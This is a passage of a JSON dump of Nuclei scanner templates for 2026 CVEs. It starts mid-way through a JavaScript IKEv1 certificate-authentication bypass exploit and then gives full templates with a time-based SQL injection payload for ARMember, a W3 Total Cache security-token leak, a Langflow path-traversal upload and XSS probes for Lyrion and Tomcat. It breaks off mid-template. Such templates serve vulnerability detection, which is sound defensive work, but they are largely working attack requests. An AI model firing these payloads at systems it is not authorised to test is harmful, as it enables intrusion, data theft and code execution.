w=rk[r*4+cc];s[4*cc]^=(w>>>24)&0xff;s[4*cc+1]^=(w>>>16)&0xff;s[4*cc+2]^=(w>>>8)&0xff;s[4*cc+3]^=w&0xff;}}\n            ark(0);\n            for(let r=1;r<14;r++){\n              for(let i=0;i<16;i++)s[i]=SB[s[i]];\n              let t;\n              t=s[1];s[1]=s[5];s[5]=s[9];s[9]=s[13];s[13]=t;\n              t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;\n              t=s[3];s[3]=s[15];s[15]=s[11];s[11]=s[7];s[7]=t;\n              for(let cc=0;cc<4;cc++){const a=s[4*cc],b=s[4*cc+1],cd=s[4*cc+2],dd=s[4*cc+3];s[4*cc]=gm(2,a)^gm(3,b)^cd^dd;s[4*cc+1]=a^gm(2,b)^gm(3,cd)^dd;s[4*cc+2]=a^b^gm(2,cd)^gm(3,dd);s[4*cc+3]=gm(3,a)^b^cd^gm(2,dd);}\n              ark(r);\n            }\n            for(let i=0;i<16;i++)s[i]=SB[s[i]];\n            let t;\n            t=s[1];s[1]=s[5];s[5]=s[9];s[9]=s[13];s[13]=t;\n            t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;\n            t=s[3];s[3]=s[15];s[15]=s[11];s[11]=s[7];s[7]=t;\n            ark(14);return s;\n          }\n          let ct=[],prev=Array.from(iv);\n          for(let i=0;i<pt.length;i+=16){const e=aesBlk(pt.slice(i,i+16).map((v,j)=>v^prev[j]));ct=ct.concat(e);prev=e;}\n          return ct;\n        }\n\n        const ISB=new Array(256);for(let i=0;i<256;i++)ISB[SB[i]]=i;\n        function aesDecBlk(blk,rk){\n          let s=blk.slice();\n          function ark(r){for(let cc=0;cc<4;cc++){const w=rk[r*4+cc];s[4*cc]^=(w>>>24)&0xff;s[4*cc+1]^=(w>>>16)&0xff;s[4*cc+2]^=(w>>>8)&0xff;s[4*cc+3]^=w&0xff;}}\n          ark(14);\n          for(let r=13;r>=1;r--){\n            let t;t=s[13];s[13]=s[9];s[9]=s[5];s[5]=s[1];s[1]=t;\n            t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;\n            t=s[7];s[7]=s[11];s[11]=s[15];s[15]=s[3];s[3]=t;\n            for(let i=0;i<16;i++)s[i]=ISB[s[i]];\n            ark(r);\n            for(let cc=0;cc<4;cc++){const a=s[4*cc],b=s[4*cc+1],cd=s[4*cc+2],dd=s[4*cc+3];s[4*cc]=gm(14,a)^gm(11,b)^gm(13,cd)^gm(9,dd);s[4*cc+1]=gm(9,a)^gm(14,b)^gm(11,cd)^gm(13,dd);s[4*cc+2]=gm(13,a)^gm(9,b)^gm(14,cd)^gm(11,dd);s[4*cc+3]=gm(11,a)^gm(13,b)^gm(9,cd)^gm(14,dd);}\n          }\n          let t;t=s[13];s[13]=s[9];s[9]=s[5];s[5]=s[1];s[1]=t;\n          t=s[2];s[2]=s[10];s[10]=t;t=s[6];s[6]=s[14];s[14]=t;\n          t=s[7];s[7]=s[11];s[11]=s[15];s[15]=s[3];s[3]=t;\n          for(let i=0;i<16;i++)s[i]=ISB[s[i]];\n          ark(0);return s;\n        }\n        function cbcDec(key,iv,ct){\n          const rk=aesKex(key);let pt=[],prev=Array.from(iv);\n          for(let i=0;i<ct.length;i+=16){const block=ct.slice(i,i+16);const dec=aesDecBlk(block,rk);pt=pt.concat(dec.map((v,j)=>v^prev[j]));prev=block;}\n          return pt;\n        }\n\n        const DHP=BigInt(\"0x\"+\n          \"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74\"+\n          \"020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437\"+\n          \"4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED\"+\n          \"EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF\");\n        function modpow(base,exp,mod){\n          let r=BigInt(1);base=base%mod;\n          while(exp>BigInt(0)){if(exp&BigInt(1))r=r*base%mod;exp>>=BigInt(1);base=base*base%mod;}\n          return r;\n        }\n\n        const PRIV_HEX=\n          \"00000000000000000000000000000000000000000000000000000000000000006a09e667f3bcc908\"+\n          \"b2fb1366ea957d3e3adec17512775099da2f590b0667322a5e7b54d7e9b4c2a59acf32a7a5b3e8d1\"+\n          \"c4f6a2b8e0d3791f2b4a8c0f5e931d67a8c4d2f1b7e0395c6b3a2f8e1d094c57f2a5c9e3b7d180\"+\n          \"4a39e6f8c2a450b179\";\n        const PUB_HEX=\n          \"cf9939ccf7991becadce718a5223536987d94b3507a2b35563bb35fa883c1376\"+\n          \"d33a185ff6bbdd71748a03c8a51b0b93783b3d5d7f8c7d49dc5472d5e2b598f5\"+\n          \"24bbc2d7b6cb60e12187f3b14970c294c6cc10278e0bdb7f1b1a2c49d32a0cbf\"+\n          \"b5f85404b436c3da209d801d17cc24d8e15fa115c17e16527846b0ff8337e353\";\n        const NONCE_HEX=\"6a09e667f3bcc908b2fb1366ea957d3e3adec17512775099da2f590b0667322a\";\n        const CERT_HEX=\n          \"308202f4308201dca00302010202084e75636c65690001300d06092a864886f70d01010b0500303a\"+\n          \"31183016060355040a0c0f4e75636c6569446574656374696f6e310e300c060355040b0c05757365\"+\n          \"7273310e300c06035504030c0561646d696e301e170d3234313233313030303030305a170d333431\"+\n          \"323330303030303030305a303a31183016060355040a0c0f4e75636c6569446574656374696f6e31\"+\n          \"0e300c060355040b0c057573657273310e300c06035504030c0561646d696e30820122300d06092a\"+\n          \"864886f70d01010105000382010f003082010a0282010100bf1ae034d767cef8475729e73282d821\"+\n          \"a00485c314a88ef73f87794be21a0b8e44954d023dfdf2a4f760565bec22bc5d6de5cf02a5ced6c6\"+\n          \"d048a9e6f72ba229fba2c151f5de4ef8ad4efc87c740c80bc3b5ab7f59d2e6d8a981f3e061b95103\"+\n          \"c58e35c5f84f29394a92f5834a416b5829e2602fcbe3d1f2007447bc60204b444b9330ed4c4060b8\"+\n          \"08caccd62b40f61e79fdd66f478749f937a2a4cc57673dce709cda72ed6b7743847609a2bd2e3048\"+\n          \"8e66c4cfaf682a6903c1b2032148ab597006e0f6481b57c84c4fde143f8f1b7578bc9159272706e2\"+\n          \"49997786d5fbd5b72eb182f5f1d511a5cfac396fe9a8b21b3d368a6512c8daf9889bdf255c900569\"+\n          \"0203010001300d06092a864886f70d01010b05000382010100a32194decd21c07450dfaab41d3619\"+\n          \"d1ce3f6618b0c9cc8e614433030dc102d70864ba96bac5430d1a28d483c3ea95500814c785850581\"+\n          \"affe311050740ae10750fdea82588645e6985642892ddf7cb6f7f961e4908f92f2e4f6e2a9eb3d30\"+\n          \"be6205a0f3c30cdbface9d9bc98f72d1a9f4ec8075cea78ea81d9b1b246873e006fc1d6a2c4caf46\"+\n          \"d588f546ec3f1f0251c2bc01ee8c41c52ec981e6d732f4fbe49c79b11dc431e5729e6d8f0cfa81bd\"+\n          \"1a9085de521d338832c6f29f4e1e51b498c851e8b04406a9ce2c72a94a35799806277f36eedfb828\"+\n          \"7352c2b61cb2cc2fbd548d8df57bb549964d6e443d266686bbeaeb60e5094c0dc1034c14b83abc144c\";\n        const SUBJ_HEX=\n          \"303a31183016060355040a0c0f4e75636c6569446574656374696f6e310e300c060355040b0c0575\"+\n          \"73657273310e300c06035504030c0561646d696e\";\n        function rndBytes(n){const r=[];for(let i=0;i<n;i++)r.push(Math.floor(Math.random()*256));return r;}\n        const ICOOKIE    = rndBytes(8);\n        const VPNExtFeat = h2b(\"3cf187b2474029ea46ac7fd0eaf289f500000004\");\n        const BAD_SIG    = new Array(256).fill(0x41); // 256-byte static invalid signature\n\n        function ikeHdr(ic,rc,next,exch,flags,msgId,bLen){\n          return [...ic,...rc,next,0x10,exch,flags,...wr32(msgId),...wr32(28+bLen)];\n        }\n        function ikePl(next,body){\n          const len=4+body.length;return[next,0,(len>>8)&0xff,len&0xff,...body];\n        }\n        function walkPls(data,firstType){\n          const pls=[];let off=0,nxt=firstType;\n          while(nxt&&off+4<=data.length){\n            const pl=(data[off+2]<<8)|data[off+3];\n            if(pl<4||off+pl>data.length)break;\n            pls.push({t:nxt,d:data.slice(off+4,off+pl)});\n            nxt=data[off];off+=pl;\n          }\n          return pls;\n        }\n\n        let conn;\n        try {\n          if(USE_TCPT) conn=c.Open('tcp',Host+':'+Port);\n          else conn=c.Open('udp',Host+':'+Port);\n          conn.SetTimeout(10);\n        } catch(e) { return \"ERROR: Connection failed: \"+e; }\n\n        function recvArr(){\n          try{\n            const raw=conn.Recv(65535);\n            if(!raw)return null;\n            const buf=new nb.Buffer();buf.Write(raw);\n            const hex=buf.Hex();\n            return hex&&hex.length>=8?h2b(hex):null;\n          }catch(e){return null;}\n        }\n\n        if(USE_TCPT){\n          try{\n            conn.SendHex(\"0000000c00000001000000010000000200000001\");\n            const hs=recvArr();\n            if(!hs||hs.length<9||rd32(hs,4)!==1||hs[8]!==0){\n              conn.Close();return \"NO_RESPONSE: TCPT handshake failed\";\n            }\n          }catch(e){conn.Close();return \"ERROR: TCPT handshake: \"+e;}\n        }\n\n        function sendIke(pkt){\n          if(USE_TCPT){const fr=[...wr32(pkt.length),0,0,0,2,...pkt];conn.SendHex(b2h(fr));}\n          else conn.SendHex(b2h(pkt));\n        }\n        function recvIke(){\n          const raw=recvArr();\n          if(!raw||raw.length<28)return null;\n          if(!USE_TCPT)return raw;\n          let off=0;\n          while(off+8<=raw.length){\n            const flen=rd32(raw,off),ftype=rd32(raw,off+4);\n            if(ftype===2&&flen>=28&&off+8+flen<=raw.length)return raw.slice(off+8,off+8+flen);\n            if(flen===0||flen>65536)break;\n            off+=8+flen;\n          }\n          return raw.length>=28?raw:null;\n        }\n        function parseIke(raw){\n          if(!raw||raw.length<28)return null;\n          return{rc:raw.slice(8,16),fp:raw[16],ex:raw[18],enc:!!(raw[19]&1),body:raw.slice(28)};\n        }\n\n        const PRIV=h2b(PRIV_HEX.replace(/\\s/g,\"\"));\n        const PUB =h2b(PUB_HEX.replace(/\\s/g,\"\"));\n        const NI  =h2b(NONCE_HEX);\n        const CERT=h2b(CERT_HEX.replace(/\\s/g,\"\"));\n        const SUBJ=h2b(SUBJ_HEX.replace(/\\s/g,\"\"));\n        let rcookie=new Array(8).fill(0);\n\n        const ATTRS=h2b(\"80010007800e0100800200028003000380040002\");\n        const XFORM=[...h2b(\"0000001c01010000\"),...ATTRS];           // 28 B\n        const PROP =[...h2b(\"0000002401010001\"),...XFORM];           // 36 B\n        const SA_BD=[...h2b(\"0000000100000001\"),...PROP];            // 44 B (DOI+Sit+Prop)\n        const SA_PL=ikePl(13,SA_BD);                                 // next=VID(13)\n        const VD_PL=ikePl(0,Array.from(VPNExtFeat));                 // VPNExtFeatures\n        const MM1B =[...SA_PL,...VD_PL];\n        sendIke([...ikeHdr(ICOOKIE,rcookie,1,2,0,0,MM1B.length),...MM1B]);\n\n        const mm2r=recvIke(),mm2=parseIke(mm2r);\n        if(!mm2||mm2.ex!==2||mm2.enc){conn.Close();return \"NO_CERT_REALM: No valid IKEv1 MM2 response\";}\n        rcookie=Array.from(mm2.rc);\n        if(!walkPls(mm2.body,mm2.fp).some(p=>p.t===1)){\n          conn.Close();return \"NO_CERT_REALM: Gateway did not accept RSA-SIG proposal\";\n        }\n\n        const MM3B=[...ikePl(10,PUB),...ikePl(0,NI)];\n        sendIke([...ikeHdr(ICOOKIE,rcookie,4,2,0,0,MM3B.length),...MM3B]);\n\n        const mm4r=recvIke(),mm4=parseIke(mm4r);\n        if(!mm4||mm4.ex!==2){conn.Close();return \"INCONCLUSIVE: No MM4 response\";}\n        const m4ps=walkPls(mm4.body,mm4.fp);\n        const sKE=(m4ps.find(p=>p.t===4)||{d:null}).d;   // server DH public key\n        const sNR=(m4ps.find(p=>p.t===10)||{d:null}).d;  // server nonce (Nr)\n        if(!sKE||!sNR){conn.Close();return \"INCONCLUSIVE: Missing KE/Nonce in MM4\";}\n\n        const gxy_int=modpow(BigInt(\"0x\"+b2h(sKE)),BigInt(\"0x\"+b2h(PRIV)),DHP);\n        const gxy=h2b(gxy_int.toString(16).padStart(256,\"0\"));\n        const skeyid=hmac1([...NI,...Array.from(sNR)],gxy);\n        const skd=hmac1(skeyid,[...gxy,...ICOOKIE,...rcookie,0]);\n        const ska=hmac1(skeyid,[...skd,...gxy,...ICOOKIE,...rcookie,1]);\n        const ske=hmac1(skeyid,[...ska,...gxy,...ICOOKIE,...rcookie,2]);\n        let blk=hmac1(ske,[0]);\n        let enc_key=[...blk];\n        while(enc_key.length<32){blk=hmac1(ske,blk);enc_key=[...enc_key,...blk];}\n        enc_key=enc_key.slice(0,32);\n        const iv=sha1([...PUB,...Array.from(sKE)]).slice(0,16);\n\n        const id_body=[9,0,0,0,...SUBJ];\n        const cert_body=[4/*CERT_X509_SIG*/,...CERT];\n        let inner=[...ikePl(6,id_body),...ikePl(9,cert_body),...ikePl(0,BAD_SIG)];\n        const pad=(16-(inner.length%16))%16;\n        for(let i=0;i<pad;i++)inner.push(0);\n        const ct=cbcEnc(enc_key,iv,inner);\n        const mm6_iv=ct.slice(-16);\n        sendIke([...ikeHdr(ICOOKIE,rcookie,5,2,0x01/*ENC*/,0,ct.length),...ct]);\n\n        let result=\"INCONCLUSIVE: No decisive response from gateway\";\n        for(let attempt=0;attempt<6;attempt++){\n          const mm6r=recvIke(),mm6=parseIke(mm6r);\n          if(!mm6)continue;\n          if(mm6.ex===5){result=\"REJECTED: Gateway rejected authentication for '\"+Username+\"'\";break;}\n          if(mm6.ex===2&&mm6.enc){\n            let gwIp=Host;\n            try{\n              const dec=cbcDec(enc_key,mm6_iv,Array.from(mm6.body));\n              const pls6=walkPls(dec,mm6.fp);\n              const idp=pls6.find(p=>p.t===5);\n              if(idp&&idp.d.length>=8&&idp.d[0]===1)gwIp=idp.d[4]+\".\"+idp.d[5]+\".\"+idp.d[6]+\".\"+idp.d[7];\n            }catch(e){}\n            result=\"BYPASSED: Certificate-auth bypass confirmed for '\"+Username+\"'. Gateway-IP:\"+gwIp;\n            break;\n          }\n        }\n        conn.Close();\n        return result;\n      })()\n\n    args:\n      Host: \"{{Host}}\"\n      Port: 500\n      Username: \"admin\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"BYPASSED\"\n\n      - type: word\n        words:\n          - \"Certificate-auth bypass confirmed\"\n\n    extractors:\n      - type: regex\n        name: gateway-ip\n        regex:\n          - \"Gateway-IP:([0-9.]+)\"\n        group: 1\n# digest: 4a0a0047304502202467c4ce9b3a751b8e01f298bfb723b5f34dd98542570243a418bda921dc8b43022100f03180cfd4bea128c6de0b0a34b4e617a70f59e99bf504d97c6fa8a7ba2480ff:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-50751.yaml","vuln_id":"cve-2026-50751"},{"raw":"id: CVE-2026-5073\n\ninfo:\n  name: WordPress ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The ARMember Premium plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'arm_directory_paging_action' AJAX action in all versions up to, and including, 7.3.1. This is due to insufficient escaping on the user-supplied 'order' and 'orderby' parameters and the lack of sufficient preparation on the existing SQL query in the `arm_get_directory_members()` function.\n  impact: |\n    This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n  remediation: |\n    Update ARMember Premium to version 7.3.2 or later.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/armember/vulnerability/wordpress-armember-premium-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-7-3-1-unauthenticated-sql-injection-vulnerability\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5f6d2a2-ad3e-4afc-b6fd-745881d85b6b\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-5073\n    - https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-5073\n    epss-score: 0.01383\n    epss-percentile: 0.70967\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: reputeinfosystems\n    product: armember\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/armember-membership/\"\n    fofa-query: body=\"/wp-content/plugins/armember-membership/\"\n  tags: cve,cve2026,sqli,time-based-sqli,wordpress,wp,wp-plugin,armember,unauth,vkev\n\nflow: |\n  http(\"detect\") && http(\"get-nonce\") && http(\"sqli\")\n\nhttp:\n  - id: detect\n    method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt\"\n\n    matchers:\n      - type: word\n        words:\n          - \"ARMember\"\n        internal: true\n\n  - id: get-nonce\n    method: GET\n    path:\n      - \"{{BaseURL}}/index.php?rest_route=/wp/v2/pages&per_page=100\"\n\n    extractors:\n      - type: regex\n        name: nonce\n        internal: true\n        group: 1\n        regex:\n          - \"name='arm_wp_nonce'[^>]*value='([a-f0-9]+)'\"\n\n    matchers:\n      - type: word\n        words:\n          - \"arm_wp_nonce\"\n        internal: true\n\n  - id: sqli\n    raw:\n      - |\n        @timeout: 15s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=arm_directory_paging_action&pagination=infinite&id=1&type=directory&orderby=display_name,IF(1=1,SLEEP(6),0)&order=ASC&per_page=10&current_page=1&arm_wp_nonce={{nonce}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=6\"\n\n      - type: word\n        part: body\n        words:\n          - \"arm_directory_paging_container\"\n# digest: 4a0a0047304502210086b5224d00fa73441ccdfdc85ec536eb6c8d9485540d38e0350ab723a0dcce06022009c2fe7cec97f7b837ae8bfef1ac3c74c089630f446880b4bea80ca611c0a5a0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-5073.yaml","vuln_id":"cve-2026-5073"},{"raw":"id: CVE-2026-5032\n\ninfo:\n  name: W3 Total Cache <= 2.9.3 - Unauthenticated Dynamic Security Token Disclosure\n  author: prithvee07\n  severity: high\n  description: |\n    The W3 Total Cache WordPress plugin through version 2.9.3 skips its entire output buffering and processing pipeline whenever an incoming request's User-Agent header contains the string \"W3 Total Cache\", without authenticating the caller. On sites that use developer-placed dynamic fragment tags, the raw mfunc/mclude HTML comments - which embed the per-site W3TC_DYNAMIC_SECURITY token - are therefore rendered directly into the page source instead of being processed and stripped, letting an unauthenticated attacker harvest the token by comparing a normal response against one sent with the magic User-Agent.\n  impact: |\n    Unauthenticated attackers can leak the site's W3TC_DYNAMIC_SECURITY token, which can then be used to craft valid mfunc/mclude dynamic fragment tags and execute arbitrary PHP code on sites that have fragment caching enabled with existing dynamic fragment tags.\n  remediation: |\n    Update the W3 Total Cache plugin to version 2.9.4 or later.\n  reference:\n    - https://github.com/advisories/GHSA-fxg7-rh9m-q77p\n    - https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.9.3/Generic_Plugin.php#L1016\n    - https://plugins.trac.wordpress.org/changeset/3495959/w3-total-cache\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a65eb62d-847b-4f3a-848b-1290e3118c01?source=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-5032\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-5032\n    epss-score: 0.03057\n    epss-percentile: 0.87016\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: boldgrid\n    product: w3-total-cache\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/w3-total-cache\"\n    fofa-query: body=\"wp-content/plugins/w3-total-cache\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,w3-total-cache,exposure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - '!regex(\"<!--\\\\s*(mfunc|mclude)\\\\s+\\\\S+\", body)'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: W3 Total Cache\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: regex\n        part: body\n        regex:\n          - '<!--\\s*(?:mfunc|mclude)\\s+\\S+'\n\n    extractors:\n      - type: regex\n        name: w3tc-dynamic-security\n        part: body\n        group: 1\n        regex:\n          - '<!--\\s*(?:mfunc|mclude)\\s+(\\S+)'\n# digest: 4b0a004830460221008e19ba24c7ff9a5acd9688003f98b92152effa77fe5616940e6cedc8d99bbd9a022100cb8042788ec966b30bf5d111e0bd808369851f6bf0234b43527d727bd1ce2e26:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-5032.yaml","vuln_id":"cve-2026-5032"},{"raw":"id: CVE-2026-5027\n\ninfo:\n  name: Langflow <= 1.8.4 - Path Traversal to RCE via File Upload\n  author: pussycat0x\n  severity: high\n  description: |\n    The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.\n  impact: |\n    Attackers can write files to arbitrary locations, potentially leading to system compromise or data tampering.\n  remediation: |\n    Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.\n  reference:\n    - https://github.com/langflow-ai/langflow/pull/12227\n    - https://github.com/0xBlackash/CVE-2026-5027\n    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-5027\n    epss-score: 0.36141\n    epss-percentile: 0.98406\n    cwe-id: CWE-22\n  metadata:\n    max-request: 2\n    vendor: langflow-ai\n    product: langflow\n    shodan-query: title:\"Langflow\"\n    fofa-query: title=\"Langflow\"\n  tags: cve,cve2026,langflow,lfi,intrusive,vkev\n\nflow: http(1) || http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/auto_login HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n      - |\n        POST /api/v2/files HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{access_token}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650\n\n        ------WebKitFormBoundarya3f2c8d9e7b14650\n        Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../tmp/{{randstr}}.txt\"\n        Content-Type: text/plain\n\n        {{randstr}}\n        ------WebKitFormBoundarya3f2c8d9e7b14650--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code_2 == 201\"\n          - \"contains_all(body_2, 'id','name','path')\"\n        condition: and\n\n    extractors:\n      - type: json\n        name: access_token\n        part: body_1\n        json:\n          - \".access_token\"\n        internal: true\n\n      - type: json\n        part: body_2\n        json:\n          - \".path\"\n\n  - raw:\n      - |\n        POST /api/v1/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: application/json\n\n        username={{username}}&password={{password}}\n\n      - |\n        POST /api/v2/files HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{access_token}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650\n\n        ------WebKitFormBoundarya3f2c8d9e7b14650\n        Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../tmp/{{randstr}}.txt\"\n        Content-Type: text/plain\n\n        {{randstr}}\n        ------WebKitFormBoundarya3f2c8d9e7b14650--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code_2 == 201\"\n          - \"contains_all(body_2, 'id','name','path')\"\n        condition: and\n\n    extractors:\n      - type: json\n        name: access_token\n        part: body_1\n        json:\n          - \".access_token\"\n        internal: true\n\n      - type: json\n        part: body_2\n        json:\n          - \".path\"\n# digest: 4a0a00473045022100a1b1c9fcd6fa4930e15f84b2819f14437feed59ffe5ee1d6310a1aa50f8de25902201142cf385d54a287a9c4250a85bef63dd1d6e180fdbf912badfe8de0bde56645:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-5027.yaml","vuln_id":"cve-2026-5027"},{"raw":"id: CVE-2026-50230\n\ninfo:\n  name: Lyrion Music Server <= 9.2.0 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    Lyrion Music Server 9.2.0 contains a reflected XSS caused by improper sanitization of the search parameter in the server.log endpoint, letting unauthenticated attackers execute arbitrary script in users' browsers.\n  impact: |\n    Attackers can execute arbitrary JavaScript in users' browsers, potentially stealing session data or performing actions on behalf of users.\n  remediation: |\n    Update to the latest version that patches this vulnerability.\n  reference:\n    - https://www.zeroscience.mk/#/advisories/ZSL-2026-5988\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-50230\n    - https://www.lyrion.org\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-50230\n    epss-score: 0.00406\n    epss-percentile: 0.34659\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: title=\"Lyrion Music Server\"\n  tags: cve,cve2026,lyrion,lms,xss,reflected,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /jsonrpc.js HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"id\":1,\"method\":\"slim.request\",\"params\":[0,[\"version\",\"?\"]]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"_version\")'\n          - 'compare_versions(lmsversion, \"<= 9.2.0\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lmsversion\n        part: body\n        regex:\n          - '\"_version\"\\s*:\\s*\"([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)'\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        GET /server.log?search=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"><script>alert(document.domain)</script>'\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100bbc4a6dde52583c6baa9f9368bae0a7b81944426813d7ef95b0db2e7ab47b8e402205fab6afe4734de498eeb93de04832b7981754e0d061c7e1309b94200b6485b70:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-50230.yaml","vuln_id":"cve-2026-50230"},{"raw":"id: CVE-2026-50229\n\ninfo:\n  name: Apache Tomcat - Cross-Site Scripting\n  author: yshahinzadeh,amirmsafari\n  severity: medium\n  description: |\n    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in the number guess example for Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.22, from 10.1.0-M1 through 10.1.55, from 9.0.0.M1 through 9.0.118, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Other versions that have reached end of support may also be affected. Users are recommended to upgrade to version 11.0.23, 10.1.56 or 9.0.119, which fix the issue.\n  impact: |\n    Remote attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.\n  remediation: |\n    Upgrade to versions 11.0.23, 10.1.56, or 9.0.119 or later.\n  reference:\n    - https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0\n    - https://www.cve.org/CVERecord?id=CVE-2026-50229\n    - https://tomcat.apache.org/security-11.html\n    - https://www.herodevs.com/vulnerability-directory/cve-2026-50229\n  classification:\n    cwe-id: CWE-80\n    cve-id: CVE-2026-50229\n    epss-score: 0.04091\n    epss-percentile: 0.90277\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: tomcat\n    shodan-query: html:\"Apache Tomcat\"\n    fofa-query: app=\"APACHE-Tomcat\"\n  tags: cve,cve2026,apache,tomcat,xss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/examples/jsp/num/numguess.jsp?guess=5&hint=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<script>alert(document.domain)</script>'\n          - 'Number Guess'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b6597169b2d86c95e20039a8e7aa9179c943a1714d866ad1843dd3c1c89091b3022100be69918969385e8a5ad3b10923fb5bf04622b8897721cff5bf6d7ce0df2dba4f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-50229.yaml","vuln_id":"cve-2026-50229"},{"raw":"id: CVE-2026-50160\n\ninfo:\n  name: Hoppscotch <= 2026.4.1 - Mass Assignment JWT_SECRET Overwrite\n  author: str4k3r\n  severity: 